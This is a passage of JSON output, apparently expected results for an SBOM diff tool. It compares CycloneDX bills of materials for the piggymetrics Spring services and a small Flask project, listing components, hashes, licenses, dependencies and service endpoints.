"org.springframework.cloud", "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}]}}}, "result_3": {"diff_summary": {"bom_1.json": {"components": {"applications": [{"bom-ref": "pkg:github/actions/setup-python@v2", "type": "application", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "version": "v2"}], "frameworks": [{"bom-ref": "pkg:pypi/flask@1.1.2", "type": "framework", "name": "flask", "purl": "pkg:pypi/flask@1.1.2", "version": "1.1.2"}]}}, "bom_2.json": {"components": {"applications": [{"bom-ref": "pkg:github/actions/setup-python@v2", "type": "application", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "version": "v2"}], "frameworks": [{"bom-ref": "pkg:pypi/flask@1.1.0", "type": "framework", "name": "flask", "purl": "pkg:pypi/flask@1.1.0", "version": "1.1.0"}]}}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:pypi/werkzeug@1.0.1", "type": "library", "name": "Werkzeug", "purl": "pkg:pypi/werkzeug@1.0.1", "version": "1.0.1"}], "applications": [{"bom-ref": "pkg:github/actions/checkout@v2", "type": "application", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "version": "v2"}]}}}, "result_4": {"common_summary": {"components": {"libraries": [{"bom-ref": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.9.6?type=jar", "type": "library", "description": "Core Jackson processing abstractions (aka Streaming API), implementation for JSON", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\fasterxml\\jackson\\core\\jackson-core\\2.9.6\\jackson-core-2.9.6.jar"}]}}, "group": "com.fasterxml.jackson.core", "hashes": [{"alg": "SHA3-256", "content": "243fdbf974b456d3d96ac5c0d018c3ff2ba6f8dedeea5510da8eb851f2026efb"}, {"alg": "SHA-1", "content": "4e393793c37c77e042ccc7be5a914ae39251b365"}, {"alg": "SHA-384", "content": "59f87a260de53f8ddabe35749cd8abc71e52ebfeacd51b1e68363fe4bf72e632a7ea3648340969e8fdb0eb90d994fff4"}, {"alg": "SHA3-384", "content": "626fc0c5049dde3d55e7b47a935e735bd0dd4aed80d22ba5ec708d581c710702a4a2f4963a1d7870692a77e05d67fd75"}, {"alg": "SHA3-512", "content": "6944f9effea908ae8564a7a1a951a9c7b6e27e7cc978eac30fb43ddef0870103f669065d4b0df7293d5d541f9bf9e04b0cebbf26fdf0159d1dffb6fa465bc64f"}, {"alg": "SHA-512", "content": "a1b9b68b67d442a47e36b46b37b6b0ad7a10c547a1cf7adb4705baec77356e1080049d310b3b530f66bbd3c0ed05cfe43c041d6ef4ffbbc6731149624df4e699"}, {"alg": "MD5", "content": "f3cf83b839fac92307cad542c2ded5c4"}, {"alg": "SHA-256", "content": "fab8746aedd6427788ee390ea04d438ec141bff7eb3476f8bdd5d9110fb2718a"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jackson-core", "publisher": "FasterXML", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-core@2.9.6?type=jar", "scope": "required", "version": "2.9.6"}, {"bom-ref": "pkg:maven/org.aspectj/aspectjweaver@1.8.13?type=jar", "type": "library", "description": "The AspectJ weaver introduces advices to java classes", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\aspectj\\aspectjweaver\\1.8.13\\aspectjweaver-1.8.13.jar"}]}}, "group": "org.aspectj", "hashes": [{"alg": "MD5", "content": "4a95811a5b41a038a359c05189de9829"}, {"alg": "SHA3-384", "content": "71b931c9517a44ec80139384581067a8d2ebb642d9bae8ce2ad785e6479a1e380ab9d5d5720582bd7d9e2d33c7322571"}, {"alg": "SHA3-256", "content": "8fc704392325ca3d4597055a9e7780b7e2ada5bf63ca1d60a9bbfbc2c6d8f1df"}, {"alg": "SHA-256", "content": "965d0928b0e07dcedb67f0d0a48653d36a6cff257e3270cb28ea48fef6c30a27"}, {"alg": "SHA-384", "content": "a7aa2b3cbd2abc4264f69e97e70e202c24d8fa2c67376cd1c16731fecee57b518cd41c45c0288e036100c6a7c53750ec"}, {"alg": "SHA-1", "content": "ad94df2a28d658a40dc27bbaff6a1ce5fbf04e9b"}, {"alg": "SHA-512", "content": "be2b21636f7e6786c9c3c50684e522520d6bc0580ce49ff8a9c0fbe422568acbb91fd70dde63a3624098ba10d4e3892f2de0ffaa05f595278d2726b44e6aa576"}, {"alg": "SHA3-512", "content": "e5d1354f72fcaf1018ff248554491077e8037c116ee6f66d98f49f290f17417bb0d73f18775f00717978755ea44533c95d13011217531d065ac3f15b9c582d7a"}], "licenses": [{"license": {"id": "EPL-1.0"}}], "name": "aspectjweaver", "purl": "pkg:maven/org.aspectj/aspectjweaver@1.8.13?type=jar", "scope": "required", "version": "1.8.13"}], "frameworks": [{"bom-ref": "pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.56?type=jar", "type": "framework", "description": "The Bouncy Castle Java APIs for CMS, PKCS, EAC, TSP, CMP, CRMF, OCSP, and certificate generation. This jar contains APIs for JDK 1.5 to JDK 1.8. The APIs can be used in conjunction with a JCE/JCA provider such as the one provided with the Bouncy Castle Cryptography APIs.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\bouncycastle\\bcpkix-jdk15on\\1.56\\bcpkix-jdk15on-1.56.jar"}]}}, "group": "org.bouncycastle", "hashes": [{"alg": "MD5", "content": "17b2b704b3ad9b36a6fca1ace60a2a06"}, {"alg": "SHA-1", "content": "4648af70268b6fdb24674fb1fd7c1fcc73db1231"}, {"alg": "SHA-512", "content": "6cbc73005b662440c395d81d44d0f52a3e20550f64be3d4fe413c344257c6ef31f8080421b247273f8be42e724de370b1f1b2f0dae58a47010ef4c890d8cf5b8"}, {"alg": "SHA-256", "content": "7043dee4e9e7175e93e0b36f45b1ec1ecb893c5f755667e8b916eb8dd201c6ca"}, {"alg": "SHA-384", "content": "8147d3692b03ac84ccdd20f8ff7f3d319583434ad1a0178ab31d6433a3ed11c6e05967b26bbaf0420f400a32fb5941c5"}, {"alg": "SHA3-384", "content": "899934416d5f5c3cfe0377b41d1403730c760b6d9edec6079e73a70ec8b92616055c37fb1fee3b227a6dae360cd9cc65"}, {"alg": "SHA3-512", "content": "a6f07a263da0a69665d916d9b41f42d74061630c5ff83e8c407fa3b9aa47708c23a0a3c3c2b9f953af66b60374556c8e89eed2bb7ff3176fc4f603f957f0fffa"}, {"alg": "SHA3-256", "content": "e57c428533d3222b66f93c6bd530ee3bd0e4584c32d5ad50424072f6e8de2d98"}], "licenses": [{"license": {"name": "Bouncy Castle Licence", "url": "http://www.bouncycastle.org/licence.html"}}], "name": "bcpkix-jdk15on", "purl": "pkg:maven/org.bouncycastle/bcpkix-jdk15on@1.56?type=jar", "scope": "required", "version": "1.56"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Context", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-context\\2.0.0.RELEASE\\spring-cloud-context-2.0.0.RELEASE.jar"}]}, "occurrences": [{"location": "notification-service\\src\\main\\java\\com\\piggymetrics\\notification\\service\\EmailServiceImpl.java#22"}]}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA3-256", "content": "2074e427d7cda1199ef40962370de1dd1b3163c33ce9254a9e0b38a7667dc4bf"}, {"alg": "SHA3-512", "content": "2f05d0c7c31bbac1336e5f37fdcdcdc7bf022a369faaa5c59a2733c8174022a7848492c8faad3fb483c7dce78210cc67465ce68b766b8155652d58d6f206149c"}, {"alg": "SHA-1", "content": "3f0d28344c0dc74eb8594f3f3dd6f82c687be198"}, {"alg": "SHA3-384", "content": "96c8275ce24cc07a8d9311075e667c44a1d9f032993e58be7f9632951a91744b96b118e5db3b0a9882f8d145a7e40f13"}, {"alg": "SHA-384", "content": "96ff50360c1b03d6e225c5975405ce714464cacbbd77896c7841bbf47a14660970b13d2d11d7af1c7396ec4b0e9238e9"}, {"alg": "SHA-256", "content": "abb111a850530a2d9174939f9ef6424efa4abecf978e5625915aa84ea17bb9fe"}, {"alg": "SHA-512", "content": "c5bcf7518bb6bafc311af1e14db61f5fdcdb56e24658da1481e8806e5ad7c897e4def752b9af7d9df1e6cd998300f4f0881593e4b961827c33777c7cbcb6fb44"}, {"alg": "MD5", "content": "e7a4e7275f373c6167b7590591c19efd"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-context", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter-config\\2.0.0.RELEASE\\spring-cloud-starter-config-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-512", "content": "323078a561ef0cd2ab514801fe8604a3c16b2ae43c1bf92ad32d0abec780e0f9b557a781da1d6a9c56a225e77ef9cca3987246b3f43fbb7a5e2998caab392b8f"}, {"alg": "SHA-1", "content": "42f8c6a92ef1a09239e38a1cf65293ffde1b181c"}, {"alg": "SHA-256", "content": "5342438a378e975b8ecd228eb33f527a96267ab75bd4e5c8a0bbdc729a9f95a9"}, {"alg": "MD5", "content": "5d514c991ae9344ed41c50b6cce19bdc"}, {"alg": "SHA3-512", "content": "6736c58d38d47072eb084233062b0ea96b3b0ff66a4c4e8a4c2f3349d07a7091933abf05fda7a7660474520f7bb75c66d2c98fa9c488f98fe452d5dac132483a"}, {"alg": "SHA3-256", "content": "77acab1bc1c472b4f2d3dbadab3d278c827a967db51a6ca6d2046e1b6fc469f7"}, {"alg": "SHA-384", "content": "d1c7ef45846e4bf3e0b69131d80102d5be8e9413d40a00aebecb4461ef59b06cd52c05ae68777592a9689713b92f64b7"}, {"alg": "SHA3-384", "content": "eb6590405d9ff1dcf6b729bb561230598adf7893d61c1a46c5ae6f65974e3a3550b2b480628b656ea765be6fba9a8102"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "type": "framework", "description": "Spring Cloud Starter", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\cloud\\spring-cloud-starter\\2.0.0.RELEASE\\spring-cloud-starter-2.0.0.RELEASE.jar"}]}}, "group": "org.springframework.cloud", "hashes": [{"alg": "SHA-1", "content": "0247ea27d9483e9806f539f6031af135a6a3645f"}, {"alg": "MD5", "content": "4d031dc9879546e189c6c914c19c0542"}, {"alg": "SHA3-512", "content": "5dc4e0e8e5f8e8154aeb362d6018a6d6d3507f4b3d60a3cf51d9ae80e17a9b5a300ff26ac1b508e1ab13c569ae572e94c443e4ca1c92edd48771a7fe5287b1bd"}, {"alg": "SHA-256", "content": "670eedd14018f52145cd58de663739657a19e0e1a7ad965cf7e0a99dd37e84e4"}, {"alg": "SHA-512", "content": "8187b1a499b98e9a2e44bdfa3bca5088ee8034bce371c014b5fd4b1c2240f3447562ba74987b3d91552d45e6c2349942342133ab6bc8e2ba4330257ad63b2f3b"}, {"alg": "SHA-384", "content": "a42de307261711df91fd860690834edf0c28144e820ed8c513c3ec606ffc7728d3ff0496272b55944fbcce4ba7c79675"}, {"alg": "SHA3-256", "content": "d43f97976acafc9bcb47ccece04ef74ab61a6faddfea7ff5cae7c3c1acaedce5"}, {"alg": "SHA3-384", "content": "dba2c320469b2d423fae76fc68a0b57f4d5f7da17f2c7b44c41b7654bbb8395b7e669c538384728e2e65824e8864b501"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-cloud-starter", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}, {"bom-ref": "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar", "type": "framework", "description": "Spring Security RSA is a small utility library for RSA ciphers. It belongs to the family of Spring Security crypto libraries that handle encoding and decoding text as a general, useful thing to be able to do.", "evidence": {"callstack": {"frames": [{"fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 38, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 16, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 16, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}, {"column": 9, "fullFilename": "auth-service\\src\\main\\java\\com\\piggymetrics\\auth\\config\\WebSecurityConfig.java", "function": "authenticationManagerBean", "line": 41, "module": "com.piggymetrics.auth.config.WebSecurityConfig", "package": "com.piggymetrics.auth.config"}]}, "identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\springframework\\security\\spring-security-rsa\\1.0.5.RELEASE\\spring-security-rsa-1.0.5.RELEASE.jar"}]}}, "group": "org.springframework.security", "hashes": [{"alg": "SHA-1", "content": "31bd1111ada2f455eb0f492ed09e39deda18ca99"}, {"alg": "SHA3-512", "content": "60338f31c9984f232abb52affe0025bb4f8380a71b754d8f5f686360339985d6015f995299d73a8cf4a9eac743cfc9cc141b9de0c672d4743b2740539b497e0a"}, {"alg": "SHA-384", "content": "74af3ef26d098d1c4954e5c4d8cf19391ea1788eaa06cf4d4176d7fd7008d7b34ef594e384c480966cf3e6fd1a57df9e"}, {"alg": "MD5", "content": "88d25c857040132ad991af650dcb5e9e"}, {"alg": "SHA-512", "content": "9613e84294a7d0486d6f9529a614526b1b9e37c17c7a1f8c59baa418fe04eb5f09163ef31a7e29b59673bb899bfeaa1d9b99daf91a70dec0a3f761e12da7c284"}, {"alg": "SHA3-384", "content": "ae5b96fd3c5ef3c12bfc91cd6b74fea4d0371ebeed79ff8de1c219b6689ed878c3dde01fb90c34a0163681d234e7a9d2"}, {"alg": "SHA3-256", "content": "cfb4a0c1fee534a26992a7f7adf569b07b5e1190338adf77639afd384c20f2d3"}, {"alg": "SHA-256", "content": "db764286a058f85ac06df00c254afd8d63c618db5abc962a6bdb5f440cb2e5d6"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "spring-security-rsa", "publisher": "SpringSource", "purl": "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar", "scope": "required", "version": "1.0.5.RELEASE"}]}, "dependencies": [{"ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot-starter-test@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-eureka-client@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-netflix-turbine-stream@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter-stream-rabbit@2.0.0.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-starter@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/javax.annotation/javax.annotation-api@1.3.2?type=jar", "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.boot/spring-boot-starter-logging@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "pkg:maven/org.yaml/snakeyaml@1.19?type=jar"]}, {"ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "dependsOn": ["pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.6?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-config-client@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter@2.0.0.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot-starter@2.0.3.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-commons@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.cloud/spring-cloud-context@2.0.0.RELEASE?type=jar", "pkg:maven/org.springframework.security/spring-security-rsa@1.0.5.RELEASE?type=jar"]}], "services": [{"name": "com-piggymetrics-account-client-AuthServiceClient-createUser-service", "endpoints": ["/uaa/users"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-account-client-StatisticsServiceClient-updateStatistics-service", "endpoints": ["/statistics/{accountName}"]}, {"name": "com-piggymetrics-account-controller-AccountController-createNewAccount-service", "endpoints": ["/"]}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-getCurrentAccountStatistics-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-getStatisticsByAccountName-service", "endpoints": ["/{accountName}"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-statistics-controller-StatisticsController-saveAccountStatistics-service", "endpoints": ["/{accountName}"], "authenticated": true, "x-trust-boundary": true}], "bomFormat": "CycloneDX", "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "description": "Turbine Stream Service", "externalReferences": [{"type": "vcs", "url": "https://github.com/spring-projects/spring-boot/spring-boot-starter-parent/piggymetrics/turbine-stream-service"}, {"type": "website", "url": "https://projects.spring.io/spring-boot/#/spring-boot-starter-parent/piggymetrics/turbine-stream-service"}], "group": "com.piggymetrics", "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "turbine-stream-service", "purl": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "type": "library", "version": "0.0.1-SNAPSHOT"}, "tools": {"components": [{"author": "OWASP Foundation", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "type": "application"}]}}, "specVersion": "1.5", "version": 3}, "diff_summary": {"test/sbom-java.json": {"components": {"frameworks": [{"bom-ref": "pkg:maven/antlr/antlr@2.7.7?type=jar", "type": "framework", "description": "A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\antlr\\antlr\\2.7.7\\antlr-2.7.7.jar"}]}}, "group": "antlr", "hashes": [{"alg": "SHA-384", "content": "2e811e531ce30a2a905d093a00de596cf04406413b60422db8252b46125cadf07b71459cf6ac6da575ec030a9bf05e57"}, {"alg": "SHA-512", "content": "311c3115f9f6651d1711c52d1739e25a70f25456cacb9a2cdde7627498c30b13d721133cc75b39462ad18812a82472ef1b3b9d64fab5abb0377c12bf82043a74"}, {"alg": "SHA3-512", "content": "3a8ce565280a157dd6e08fb68c317a4c28616099c56bc4992c38cf74a10a54a89e18e7c45190ce8511360798a87adc92f432382f9d9bdde0d56664b50044b517"}, {"alg": "SHA-1", "content": "83cd2cd674a217ade95a4bb83a8a14f351f48bd0"}, {"alg": "SHA-256", "content": "88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c"}, {"alg": "SHA3-256", "content": "babce5c8beb1d5907a7ed6354589e991da7d8d5cbd86c479abfa1e1dfc4d2eb8"}, {"alg": "SHA3-384", "content": "bdf019332ae8714ef6a3904bb42bb08c1fe4feacf5e6137274884b0377d4e5b5f7aa9fe8e1ef5ca9b3e15f12320fdb67"}, {"alg": "MD5", "content": "f8f1352c52a4c6a500b597596501fc64"}], "licenses": [{"license": {"id": "BSD-3-Clause"}}], "name": "antlr", "purl": "pkg:maven/antlr/antlr@2.7.7?type=jar", "scope": "required", "version": "2.7.7"}, {"bom-ref": "pkg:maven/org.antlr/antlr-runtime@3.4?type=jar", "type": "framework", "description": "A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\antlr\\antlr-runtime\\3.4\\antlr-runtime-3.4.jar"}]}}, "group": "org.antlr", "hashes": [{"alg": "MD5", "content": "0e0318be407e51fdf7ba6777eabfdf73"}, {"alg": "SHA3-512", "content": "13d1f73c44e807b36946c21cfd506e91e8cbdf685b770cbc0dcb4e55ec28b5bc91bd90eb7f24ebfd13386a47eccf552dd2a1ab277fccabafdb7a9b40aa9d4fc5"}, {"alg": "SHA-512", "content": "1786aff2df4664483adcb319e64be7b69b643ac9508c3f11796b5aa45b9072b46f53f0a21b2ff7291162afe81506de16161746273e4532ebad75adbd81203f0d"}, {"alg": "SHA3-256", "content": "3f6cf631e9f792a41128400f8690266d915c0588ef85073a6cae73624a155b10"}, {"alg": "SHA-256", "content": "5b7cf53b7b30b034023f58030c8147c433f2bee0fe7dec8fae6bebf3708c5a63"}, {"alg": "SHA-384", "content": "6ee2dcd3cf8366fe6ee18fb87aebe2d162b232c89e0aab417f97fed368cdf652d27db518dc5e71aa2a4aadda2e7f4c7a"}, {"alg": "SHA-1", "content": "8f011408269a8e42b8548687e137d8eeb56df4b4"}, {"alg": "SHA3-384", "content": "db284c93203cbbec1b22b482a45c70c68e858a90e73b23fae66c1bc53231b0f61c5576fcf51ea0d3a30070428d7dd865"}], "name": "antlr-runtime", "purl": "pkg:maven/org.antlr/antlr-runtime@3.4?type=jar", "scope": "required", "version": "3.4"}, {"bom-ref": "pkg:maven/org.apache.commons/commons-math@2.2?type=jar", "type": "framework", "description": "The Math project is a library of lightweight, self-contained mathematics and statistics components addressing the most common practical problems not immediately available in the Java programming language or commons-lang.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\apache\\commons\\commons-math\\2.2\\commons-math-2.2.jar"}]}}, "group": "org.apache.commons", "hashes": [{"alg": "SHA-256", "content": "15993bb2a3cf50f3291b40fc980a3166a0984e7b5f1abbe5232151fd94954584"}, {"alg": "SHA-1", "content": "4877b85d388275f994a5cfc7eceb73a8045d3006"}, {"alg": "MD5", "content": "4b65633769a2d3c532c86188648bb380"}, {"alg": "SHA-384", "content": "56dde9ba9689a3efae9165010b08469108f4971542809b52facc348a841dbed76d83b5fe218ca24db6d8276f45e39458"}, {"alg": "SHA3-512", "content": "67bcc94b3d2ebf1e8d9862ad5c57609e6315e53fb27f9db16be4e1384a6619aee9e7f2d2ef530380e107d9c337cbcd4bb3a21ff4293931cb9bb488f598c63b5c"}, {"alg": "SHA3-384", "content": "7d71fdb235d8d8c4019164315b6241e893215ee3ed4934a15ccc71bae9154726e8e9ec1ab76daf0e8dec62d0069e806d"}, {"alg": "SHA3-256", "content": "d00d7bef766c466c34e0f624a1ba6ea6a2c1a0a46de81f85e331548d13b5cef0"}, {"alg": "SHA-512", "content": "f444ead8d025d92ebacc05a366cdfd6f3c9b9788f36961cc66a4c71846b9e953a586268c23268a7a8b9561159fc38f7478daea8142b3b55fb3a8dea756720ab6"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "commons-math", "publisher": "The Apache Software Foundation", "purl": "pkg:maven/org.apache.commons/commons-math@2.2?type=jar", "scope": "required", "version": "2.2"}, {"bom-ref": "pkg:maven/org.bouncycastle/bcprov-jdk15on@1.56?type=jar", "type": "framework", "description": "The Bouncy Castle Crypto package is a Java implementation of cryptographic algorithms. This jar contains JCE provider and lightweight API for the Bouncy Castle Cryptography APIs for JDK 1.5 to JDK 1.8.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\bouncycastle\\bcprov-jdk15on\\1.56\\bcprov-jdk15on-1.56.jar"}]}}, "group": "org.bouncycastle", "hashes": [{"alg": "SHA3-512", "content": "24ea4d76cc78baecafd8baeae0e201201463d920c102fe20f8dd29ff307785194dc27323215dd24680b77bbb1e65841f8150f047a3b8f007c9b04f4860b4a181"}, {"alg": "MD5", "content": "3c1bc7aaf3449308e34296546078d9f7"}, {"alg": "SHA-512", "content": "47e5f73d2b66891cf21412b807481fff4b1a844ff247ba170e7bab25a7f6303cbd5ada22e7382ba20ee344d8cc3a1909a3d255f4b24defe9357523b4a122db68"}, {"alg": "SHA-256", "content": "963e1ee14f808ffb99897d848ddcdb28fa91ddda867eb18d303e82728f878349"}, {"alg": "SHA-1", "content": "a153c6f9744a3e9dd6feab5e210e1c9861362ec7"}, {"alg": "SHA3-256", "content": "ab4e77030ace3c79f45602cf94baf81ae18305ae83037c5a37077a752cb5bfab"}, {"alg": "SHA-384", "content": "c9de4efe55d8737d5c84e7253cabe2de7b7d72180ef4c0a645ede19f627d3ebce7c0c4f19e51412b7e0a16d6c6255d32"}, {"alg": "SHA3-384", "content": "ef69f74fbf1f5416c90038f07aad6aa83e60932cf8a31400554e0380c134921ed8638528b4339edd5e8b7d1df4f62a3f"}], "licenses": [{"license": {"name": "Bouncy Castle Licence", "url": "http://www.bouncycastle.org/licence.html"}}], "name": "bcprov-jdk15on", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on@1.56?type=jar", "scope": "required", "version": "1.56"}, {"bom-ref": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "type": "framework", "description": "Spring Boot AutoConfigure", "evidence": {"callstack": {"frames": [{"fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 21, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 48, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 70, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 70, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\config\\ResourceServerConfig.java", "function": "tokenServices", "line": 23, "module": "com.piggymetrics.statistics.config.ResourceServerConfig", "package": "com.piggymetrics.statistics.config"}, {"column": 65, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "<init>", "line": 46, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"column": 19, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "<init>", "line": 48, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"column": 3, "fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "<init>", "line": 48, "module": "com.piggymetrics.statistics.service.security.CustomUserInfoTokenServices", "package": "com.piggymetrics.statistics.service.security"}, {"fullFilename": "statistics-service\\src\\main\\java\\com\\piggymetrics\\statistics\\service\\security\\CustomUserInfoTokenServices.java", "function": "<init>", "line": 46}, {"fullFilename": 